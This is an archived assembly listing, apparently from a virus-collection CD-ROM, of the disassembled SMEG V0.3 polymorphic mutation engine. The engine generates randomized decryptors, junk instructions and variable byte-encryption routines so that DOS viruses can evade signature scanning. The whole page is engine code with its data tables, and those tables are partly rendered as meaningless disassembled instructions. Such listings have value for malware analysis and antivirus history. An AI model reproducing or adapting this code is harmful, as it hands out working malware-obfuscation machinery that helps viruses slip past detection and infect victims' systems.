home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
SMEGUPD1.ZIP
/
SMEGDIS.ASM
< prev
next >
Wrap
Assembly Source File
|
1995-05-19
|
19KB
|
1,048 lines
; Disassembly of SMEG.OBJ (SMEG V0.3)
; Labels amended where known,
; This is to complement the disassembly 'DEMO.ASM' and is not for recompile
TITLE SMEG.ASM
CODESG SEGMENT BYTE PUBLIC USE16
CODESG ENDS
PUBLIC POLYMORPH ; Located at 1:0000h Type = 1
PUBLIC JUNK_GEN ; Located at 1:017Ah Type = 1
PUBLIC ENCRYPT ; Located at 1:041Ah Type = 1
CODESG SEGMENT
assume cs: CODESG
POLYMORPH:
mov [bp],cx
mov [bp+002h],dx
mov [bp+004h],di
push bx
push si
mov bx,bp
add bx,+006h
mov cx,002Dh
push bx
BLANK_IT: mov [bx],ch
inc bx
loop BLANK_IT
mov [bp+01Ch],ax
call SET_SEED
mov bx,offset CODESG:$S3
call RND
and al,1Fh
xlat
pop bx
mov cx,0004h
MAIN_REGISTERS: xor dl,dl
rcl al,1
rcl dl,1
rcl al,1
rcl dl,1
mov [bx],dl
inc bx
loop MAIN_REGISTERS
mov byte ptr [bx],05h
inc bx
inc bx
call RND
rol al,1
and al,01h
add al,06h
mov [bx],al
xor al,01h
cmp byte ptr [bx-003h],03h
jnz NOT_BX
mov [bx-003h],al
mov al,03h
NOT_BX: mov [bx+001h],al
mov al,[bx-003h]
mov [bx-001h],al
GET_KEY: call RND
xor al,ah
jz GET_KEY
mov [bp+010h],al
call RND
or al,01h
mov [bp+011h],ax
call SET_SEED
and ax,03FFh
add ax,0080h
mov [bp+025h],ax
xor ax,ax
add al,53h
dec bp
inc bp
inc di
add al,0AEh
cld
sub di,ax
call RND
and ax,0003h
add al,03h
xchg ax,cx
FRONT_JUNK: push cx
call JUNK
call RND
cmp al,8Ch
jbe $L9
and ax,0003h
add ax,offset CODESG:$S10
xchg ax,si
mov ah,0B4h
lodsb
xchg ah,al
stosw
mov ax,21CDh
stosw
$L9: pop cx
loop FRONT_JUNK
mov al,0E8h
stosb
push di
stosw
call JUNK
mov al,0E9h
stosb
pop bx
push di
stosw
push di
pop ax
dec ax
dec ax
sub ax,bx
mov [bx],ax
call JUNK
mov al,0C3h
stosb
pop bx
push di
pop ax
dec ax
dec ax
sub ax,bx
mov [bx],ax
call GENERATE_ENCRYPT
mov si,bp
add si,+008h
and al,al
jnz $L13
dec si
dec si
$L13: mov al,75h
stosb
inc di
push di
call JUNK_SAVE_SI
pop bx
mov al,0E9h
stosb
push di
inc di
inc di
mov ax,di
sub ax,bx
mov [bx-001h],al
call JUNK_SAVE_SI
call RND
and ax,0003h
add ax,ax
jz $L15
push ax
mov al,0B8h
or al,[si]
stosb
mov ax,[bp+013h]
sub ax,[bp+004h]
add ax,[bp+01Ch]
stosw
call JUNK_SAVE_SI
pop ax
$L15: add ax,offset CODESG:$S16
xchg ax,bx
call [bx]
stosw
pop bx
mov ax,di
sub ax,bx
dec ax
dec ax
mov [bx],ax
call JUNK
GO_PAD: mov ax,di
sub ax,[bp+004h]
and al,0Fh
jz NO_POLY_PADDING
cmp al,0Ch
jnbe ONE_BYTE_PAD
call NO_JUMP
jmp short GO_PAD
ONE_BYTE_PAD: call RND
db 0E8h
db 0C5h
$L31: add ax,0E6EBh
NO_POLY_PADDING: mov ax,di
sub ax,[bp+004h]
mov [bp+027h],ax
add ax,[bp+01Ch]
mov cx,[bp+019h]
sub ax,cx
mov bx,[bp+015h]
mov [bx],ax
mov bl,[bp+01Bh]
mov cl,03h
ror bl,cl
and bx,+00Fh
add bx,offset CODESG:$S22
mov ax,[bp]
call [bx]
mov bx,[bp+017h]
mov [bx],ax
$L33: pop si
pop bx
ret
JUNK_GEN:
mov cx,[bp+025h]
mov di,[bp+004h]
push cx
push di
JUNK_GEN_LOOP: call RND
stosb
loop JUNK_GEN_LOOP
pop dx
pop cx
ret
;DATA TABLES FOLLOW
$S99 dw CODESG:$S24
dw CODESG:$S25
dw CODESG:$S26
dw CODESG:$S27
dw CODESG:$S28
dw CODESG:$S29
$S3: sbb ax,si
mov cl,6Ch
in al,39h
dec si
xchg ax,bx
dec bx
db 0D2h
mov ah,2Dh
loopz $L30
push ds
xchg sp,[bx]
leave
jc $L31
fdiv dword ptr ds:[638Dh]
in al,2Dh
daa
push ds
db 0C6h
xchg dx,dx
db 072h
$S128: dec ax
inc ax
clc
cld
cmc
stc
inc ax
dec ax
$S116 db 0F1h
add byte ptr [bx+di],32h
db 0C1h
test byte ptr [di],84h
jmp $L32
sub ch,bl
rol byte ptr [bx+di],1
sbb bl,cl
adc cl,80h
sti
shl bl,1
ror bl,1
rol bl,1
rol byte ptr [di],1
test bl,bl
rol cl,1
db 0C6h
leave
add byte ptr [bx+di],0Ah
db 0D1h
neg cl
test byte ptr [bx+di],8Ah
rol si,01h
add al,cl
cmp ch,80h
pop es
db 038h
loopz $L33
rcl ax,cl
add [bp+si],sp
add [bp+si],dx
db 001h
db 08Ah
$S10: sbb [bp+si],bp
sub al,30h
$S22 dw CODESG:$S34
dw CODESG:$S35
dw CODESG:$S36
dw CODESG:$S37
dw CODESG:$S38
dw CODESG:$S39
dw CODESG:$S40
dw CODESG:$S41
$S88 dw CODESG:$S42
dw CODESG:$S43
dw CODESG:$S44
dw CODESG:$S45
$S91 dw CODESG:$S46
$L30: dw CODESG:$S47
dw CODESG:$S48
or [si-3800h],cl
add al,00h
or [bp-2800h],cl
add al,00h
pop es
mov ax,0FF04h
add [bp+si],al
add [bx+si-00FCh],di
add [bp+di],al
push di
mov al,[bx+si]
add byte ptr [di],04h
push di
mov [bx+si],al
add byte ptr [di],04h
add al,[bx+si-1000h]
add al,01h
adc [bp+di-4000h],cx
add ax,7800h
xor [bx+si],al
add byte ptr ds:[4700h],al
test byte ptr [bx+si],98h
add al,04h
inc di
test byte ptr [bx+si],90h
add al,04h
pop es
inc ax
add al,0FFh
db 000h
db 000h
add [bx+si+004h],cx
inc word ptr [bx+si]
add [bx+si],cl
mov al,04h
inc word ptr [bx+si]
db 001h
$S97: adc [bp+di],dh
db 000h
rol [di],00h
inc di
xchg al,[bx+si]
add byte ptr [di],04h
or [bx+si+004h],al
inc word ptr [bx+si]
add [bx+si],cl
dec ax
add al,0FFh
db 000h
db 000h
pop es
add word ptr [bx+si],04C0h
adc ax,8101h
db 000h
call $L49
adc [bp+si],al
db 000h
rol [di],00h
adc [bp+si],ch
db 000h
rol [di],00h
inc di
sti
add al,0B0h
add al,04h
inc di
pop [bx+si]
add byte ptr [si],04h
or [bx+si+004h],dl
$L51: inc word ptr [bx+si]
add [bx+si],cl
pop ax
add al,0FFh
db 000h
db 000h
adc [bx-4000h],al
add ax,0200h
inc ax
add al,0FFh
db 000h
db 000h
or [bp+di-4000h],cl
add ax,0900h
and ax,[bx+si]
rol [di],00h
$S73: adc [bp+di],dl
and al,0EFh
add ax,26F0h
int 0FFh
$S77: jno $L50
adc ch,dh
db 00Dh
$L141: lodsw
pop di
pusha
xor [bx+si+050h],al
xor [bx+si-001h],dl
$L52: inc dx
inc bx
db 010h
into
loopnz $L51
add [bx],bl
db 068h
$L53: adc al,0D0h
db 0D0h
db 030h
shl al,40h
lock inc word ptr [bx+si]
$L54: xor dx,[si]
and bp,si
or ax,5FDBh
outsw
shl [bx+si],20h
db 0F0h
db 0FFh
$S81: inc cx
aas
db 009h
db 080h
db 0C0h
$L50:
db 020h
shl byte ptr [bx+si],1
inc ax
$L142: and [bx+si],ah
loopnz $L52
db 0C0h
db 0F0h
db 0FFh
$S71: add ax,4213h
out dx,ax
or ax,0A070h
xor byte ptr [bx+si-4F40h],0A0h
jbe $L53
db 080h
db 0D0h
$L55: rol al,1
loopnz $L141
db 020h
db 0F0h
db 0FFh
$S82: push si
xor al,12h
db 02Eh
add ax,66D0h
cmp byte ptr [bx],0DCh
sar bh,1
$S78: daa
inc cx
xor ch,bh
db 009h
lock inc ax
db 0A8h
$L32: rcl al,1
rol al,1
loopnz $L54
db 030h
db 0F0h
db 0FFh
$S76: xor al,[bx+di+032h]
loopnz $L142
db 008h
sar byte ptr [bx+3060h],1
ror [di-001h],00h
$S74: adc [bp+di+012h],ax
out dx,ax
or bl,[bx-030h]
xor [bx+si],dh
rcl [bx+si],0C0h
inc ax
db 0F0h
db 0FFh
$L56: xor [bp+si-011h],eax
add [bx+si-7F78h],ah
shl [bx+si],20h
and [bx+si],ah
loopnz $L55
db 0C0h
mov al,60h
mov al,ds:[0A0C0h]
nop
mov al,3Ch
db 0F0h
db 0F0h
db 0FFh
$S72: add al,12h
call $L143
rcl al,1
shl al,0C9h
shl [bx+si],20h
db 0F0h
db 0FFh
$S80: jnc $S79
inc dx
in al,0Dh
fnsave [bx+si-7F60h]
mov al,0C0h
mov di,2060h
inc ax
and [bx+si-001h],dl
$S70 db 020h
loopnz $L56
db 032h
inc ax
add [bx+si],dl
iret
rol al,1
db 010h
enter 0FFFFD0C0h,0D0h
shl byte ptr [bx+si],1
shl al,0F0h
inc word ptr [bx+si]
$S75: push bp
inc bx
adc ah,bl
add ax,70D0h
and [bp-033h],dl
db 0FFh
$S79: inc di
jcxz $L144
shl [bx+si],00h
xor byte ptr [bx+si+68CFh],0D0h
db 030h
rcl al,1
rol al,1
loopnz $L57
lock inc word ptr [bx+si]
$S83 dw CODESG:ENCRYPT_0
dw CODESG:$S59
dw CODESG:$S60
dw CODESG:$S61
dw CODESG:$S62
dw CODESG:$S63
dw CODESG:$S64
dw CODESG:$S65
$S16 dw CODESG:$S66
dw CODESG:$S67
dw CODESG:$S68
dw CODESG:$S69
$S86 dw CODESG:$S70
dw CODESG:$L52
dw CODESG:$S71
dw CODESG:$S72
dw CODESG:$S73
dw CODESG:$S74
dw CODESG:$S75
dw CODESG:$S76
dw CODESG:$S77
dw CODESG:$S78
dw CODESG:$S79
$L144: dw CODESG:$L56
dw CODESG:$L54
dw CODESG:$S80
dw CODESG:$S81
dw CODESG:$S82
; End of data tables
ENCRYPT:
cld
push bx
push si
mov bl,[bp+01Bh]
$L57 = $ - 00001h
and bx,+00Fh
add bx,bx
add bx,offset CODESG:$S83
mov di,[bp+004h]
mov si,[bp+002h]
mov cx,[bp]
mov dl,[bp+010h]
ENCRYPT_LOOP: lodsb
call [bx]
stosb
loop ENCRYPT_LOOP
pop si
pop bx
ret
; Encryption engines
; These are used to convert a byte in AL to an encrypted value, returned in AL
ENCRYPT_0: xor al,dl
inc dl
ret
$S60: xor dl,al
mov al,dl
dec dl
ret
$S61: not al
$S62: xor al,dl
inc dl
inc dl
ret
$S59: xor al,dl
neg al
dec dl
dec dl
ret
$S63: add al,dl
inc dl
ret
$S64: sub al,dl
dec dl
ret
$S65: xor al,dl
dec dl
ret
$S34: neg ax
$S35: ret
$S36: neg ax
$S37: add ax,ax
ret
$S38: neg ax
$S39: mov cx,ax
add ax,ax
add ax,cx
ret
$S40: neg ax
$S41: add ax,ax
add ax,ax
ret
$S66: mov al,0E9h
stosb
mov ax,di
sub ax,[bp+013h]
inc ax
inc ax
neg ax
ret
$S67: mov ax,0E0FFh
or ah,[si]
ret
$S68: mov ax,0C350h
$L85: or al,[si]
ret
$S69: mov al,0Eh
stosb
call JUNK_SAVE_SI
mov ax,0CB50h
jmp short $L85
GENERATE_ENCRYPT: call RND
mov bx,offset CODESG:$S86
and ax,000Fh
add ax,ax
add bx,ax
mov si,[bx]
lodsb
mov [bp+01Bh],al
jmp short $L87
$L98: lodsb
cmp ah,0FFh
jz $S42
xor bh,bh
add al,al
mov bl,al
add bx,offset CODESG:$S88
mov al,dh
mov cx,0003h
call [bx]
xchg ah,al
stosb
$S42: ret
$S43: ror al,cl
$S44: and al,07h
mov bx,bp
add bx,+006h
xlat
rol al,cl
and cl,cl
jnz $L89
test dh,40h
jz $L89
cmp al,03h
jnz $L90
mov al,07h
jmp short $L89
$L90: cmp al,06h
jc $L89
sub al,02h
$L89: or ah,al
ret
$S45: ror al,cl
$S46: xor cl,cl
jmp short $S44
$S47: call near ptr $S43
mov al,dh
jmp short $S46
$S48: call near ptr $S44
mov al,dh
jmp short $S45
$L87: mov word ptr [bp+02Bh],offset CODESG:$S91
$L94: lodsb
cmp al,0FFh
jnz $L92
lodsb
ret
$L92: push si
push ax
mov cl,04h
call near ptr $L93
xor cl,cl
pop ax
call near ptr $L93
pop si
jmp short $L94
$L93: ror al,cl
and ax,000Fh
jnz $L95
and cl,cl
jz $L96
mov [bp+013h],di
ret
$L96: mov word ptr [bp+02Bh],offset CODESG:$S97
ret
$L95: push ax
call near ptr JUNK
pop ax
add ax,ax
mov bx,ax
add ax,ax
add ax,bx
add ax,[bp+02Bh]
mov word ptr [bp+02Bh],offset CODESG:$S91
xchg ax,si
lodsb
mov dh,al
lodsb
xchg ah,al
call $L98
lodsb
xchg ah,al
call $L98
lodsb
mov dl,al
and ax,000Fh
add ax,ax
add ax,offset CODESG:$S99
xchg ax,bx
jmp [bx]
$S24: ret
$S25: mov al,[bp+010h]
stosb
ret
$S26: mov [bp+015h],di
stosw
ret
$S27: mov [bp+017h],di
stosw
ret
$S28: mov ax,[bp+011h]
mov [bp+019h],ax
stosw
ret
$S29: mov al,dl
mov cl,04h
shr al,cl
and ax,000Fh
stosw
ret
JUNK_SAVE_SI: push si
mov dx,0003h
call near ptr $L100
pop si
ret
JUNK: mov dx,0007h
$L100: call RND
and ax,dx
inc ax
inc ax
xchg ax,cx
$L102: push cx
call $L101
pop cx
loop $L102
cmp [bp+01Fh],cx
jz $L103
call near ptr $L104
$L103: call near ptr $L105
mov bx,[bp+023h]
and bx,bx
jnz $L106
ret
$L106: mov al,0C3h
stosb
mov ax,di
sub ax,bx
dec ax
dec ax
mov [bx],ax
mov [bp+021h],bx
mov word ptr [bp+023h],0000h
$L105: call RND
and ax,0003h
add al,03h
xchg ax,cx
$L107: push cx
call near ptr NO_JUMP
pop cx
loop $L107
ret
$L104: mov ax,di
mov bx,[bp+01Fh]
sub ax,bx
dec al
jnz $L108
call near ptr NO_JUMP
jmp short $L104
$L108: cmp ax,007Fh
jbe $L109
xor al,al
$L109: mov [bx],al
mov word ptr [bp+01Fh],0000h
ret
$L118: and cl,0F8h
mov bx,bp
add bx,+006h
mov dh,07h
test dl,04h
jnz $L110
add bx,+003h
mov dh,03h
$L110: ret
$L121: call RND
xor ah,ah
and al,dh
add bx,ax
mov al,[bx]
test ch,01h
jnz $L111
test byte ptr [si-002h],04h
jnz $L111
mov ah,al
and al,03h
cmp al,[bp+009h]
mov al,ah
jz $L111
mov al,[bp+009h]
cmp al,04h
jc $L112
pop ax
ret
$L112: and ah,04h
or al,ah
$L111: ret
$L101: call RND
cmp ah,0C8h
jbe $L113
jmp $L114
NO_JUMP: call RND
$L113: cmp al,0F0h
jbe $L115
jmp $L21
$L115: and ax,001Fh
cmp al,[bp+01Eh]
jz NO_JUMP
mov [bp+01Eh],al
add ax,ax
add ax,offset CODESG:$S116
xchg ax,si
lodsw
xchg ax,cx
mov dl,cl
and dl,03h
call RND
and al,03h
and al,dl
or ch,al
mov dl,cl
and dl,0C0h
cmp dl,0C0h
mov dl,cl
jz $L117
call $L118
call RND
and al,0C0h
or cl,al
rol al,1
rol al,1
mov dl,al
call RND
and al,07h
or cl,al
cmp dl,03h
jz $L119
cmp al,06h
jnz $L120
mov dl,02h
and cl,3Fh
jmp short $L119
$L120: and ch,0FEh
$L119: call $L121
shl al,1
shl al,1
shl al,1
$L125: or cl,al
xchg ax,cx
xchg ah,al
stosw
and dl,dl
jnz $L122
ret
$L122: cmp dl,03h
jnz $L123
ret
$L123: call RND
and al,3Fh
stosb
dec dl
jnz $L123
ret
$L117: call $L118
call $L121
mov ah,ch
and ah,0FEh
cmp ah,0F6h
jnz $L124
test cl,10h
jz $L124
$L127: xor dl,dl
jmp short $L125
$L124: and ah,0FCh
cmp ah,0D0h
jnz $L126
jmp short $L127
$L126: test ch,01h
mov dl,02h
jnz $L125
dec dl
jmp short $L125
$L21: and al,07h
mov bx,offset CODESG:$S128
xlat
cmp al,48h
jz $L129
cmp al,40h
jnz $L130
$L129: mov cl,al
call RND
and al,03h
mov bx,bp
add bx,+009h
xlat
or al,cl
$L130: stosb
ret
$L114: cmp word ptr [bp+01Fh],+000h
jz $L131
jmp $L104
$L131: call near ptr RND
cmp ah,6Eh
jnbe $L132
$L133: and al,0Fh
or al,70h
stosb
mov [bp+01Fh],di
stosb
ret
$L132: cmp word ptr [bp+023h],+000h
jnz $L133
call near ptr RND
cmp al,78h
jbe $L134
mov al,0E9h
stosb
mov [bp+023h],di
stosw
call near ptr RND
cmp al,0AAh
jbe $L135
$L136: jmp NO_JUMP
$L135: cmp word ptr [bp+029h],+000h
jz $L136
push di
xchg ax,di
dec ax
dec ax
mov di,[bp+029h]
sub ax,di
stosw
pop di
jmp NO_JUMP
$L134: cmp word ptr [bp+021h],+000h
jz $L133
mov al,0E8h
stosb
cmp word ptr [bp+029h],+000h
jz $L137
call near ptr RND
and al,07h
cmp al,04h
jnc $L138
$L137: mov [bp+029h],di
$L138: mov ax,di
sub ax,[bp+021h]
neg ax
stosw
ret
SET_SEED: mov ah,2Ch
int 21h
mov ax,03E1h
mul dx
add ax,cx
xchg ax,cx
in ax,40h
add ax,cx
mov [bp+00Eh],ax
ret
RND: push bx
push cx
push dx
mov ax,[bp+00Eh]
mov cx,03E1h
mul cx
mov cx,ax
xor dx,dx
mov bx,0035h
div bx
add dx,cx
js $L139
in ax,40h
add dx,ax
$L139: cmp dx,[bp+00Eh]
jnz $L140
neg dx
in ax,40h
xor dx,ax
$L140: mov [bp+00Eh],dx
xchg ax,dx
pop dx
pop cx
pop bx
ret
db 1011 dup(?)
$L143 = $ + 01075h db 3018 dup(?)
$L49 = $ + 01075h ORG 007E0h
CODESG ENDS
END
